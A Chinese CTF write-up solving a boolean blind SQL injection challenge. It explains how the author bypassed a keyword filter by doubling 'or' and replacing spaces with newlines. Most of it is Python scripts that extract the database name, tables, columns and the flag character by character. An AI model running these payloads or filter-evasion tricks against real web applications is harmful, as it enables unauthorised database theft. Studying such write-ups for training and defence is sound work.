認真一點!-實驗吧
阿新 • • 發佈:2019-02-16
這個題其實是個布林盲注題,怎麼說,正常是you are in,報錯是you are not in,觸發waf是sql injection detected
然後fuzz一下,圖我就不貼了,做的時候忘了截下圖
結果大概是過濾了and,空格,逗號,union,+
這裡有個坑,fuzz的時候or是可以用的,但是嘗試id = 1'/**/or/**/'1'='1的時候報you are not in,不應該啊
試了幾下,後臺好像是匹配到or就會刪去,這裡用oorr就可以解決了
剩下的,就是布林盲注了
先爆資料庫名長度
import requests print("start") str = "You are in" url = "http://ctf5.shiyanbar.com/web/earnest/index.php " for i in range(1,30): key = {'id':"0'oorr(length(database())=%s)oorr'0"%i} res = requests.post(url,data=key).text print(i) if str in res: print('database length: %s'%i) break print("end!")
18個,然後就是爆資料庫名
import requests str = "You are in" url = "http://ctf5.shiyanbar.com/web/earnest/index.php" guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]._" database = '' print('start') for i in range(1,19): for j in guess: key = {'id':"0'oorr((mid((database())from(%s)foorr(1)))='%s')oorr'0" %(i,j)} res = requests.post(url,data=key).text print('............%s......%s.......'%(i,j)) if str in res: database += j break print(database) print("end!")
表長度
import requests str = "You are in" url = "http://ctf5.shiyanbar.com/web/earnest/index.php" guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]." i = 1 print("start") while True: res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='')oorr'0" % i res = res.replace(' ',chr(0x0a)) key = {'id':res} r = requests.post(url,data=key).text print(i) if str in r: print("length: %s"%i) break i+=1 print("end!")
表名(這裡是用@分隔開了表名,有兩張表)
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
table = ""
print("start")
for i in range(1,12):
for j in guess:
res = "0'oorr((select(mid(group_concat(table_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.tables)where(table_schema)=database())='%s')oorr'0"%(i,j)
res = res.replace(' ', chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
table += j
break
print(table)
print("end!")
列寬
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
i = 1
print("start")
while True:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='')oorr'0"%i
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print(i)
if str in r:
print("length: %s"%i)
break
i += 1
print("end!")
列名
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
column = ""
print("start")
for i in range(1,6):
for j in guess:
res = "0'oorr((select(mid(group_concat(column_name separatoorr '@')from(%s)foorr(1)))from(infoorrmation_schema.columns)where(table_name)='fiag')='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
print("......%s.........%s........."%(i,j))
if str in r:
column+=j
break
print(column)
print("end!")
很明顯,flag表flag列,dump一下就行了
import requests
str = "You are in"
url = "http://ctf5.shiyanbar.com/web/earnest/index.php"
guess = "abcdefghijklmnopqrstuvwxyz0123456789~+=-*/\{}?!:@#$&[]."
flag = ""
print("start")
for i in range(1,20):
for j in guess:
res = "0'oorr((select(mid((fl$4g)from(%s)foorr(1)))from(fiag))='%s')oorr'0"%(i,j)
res = res.replace(' ',chr(0x0a))
key = {'id':res}
r = requests.post(url,data=key).text
'print("........%s..........%s........"%(i,j))'
if str in r:
flag+=j
print(flag)
break
print(flag)
print("end!")
flag get√
不過這裡有個錯誤,我沒有把空格考慮進去,然後那個減號其實是空格2333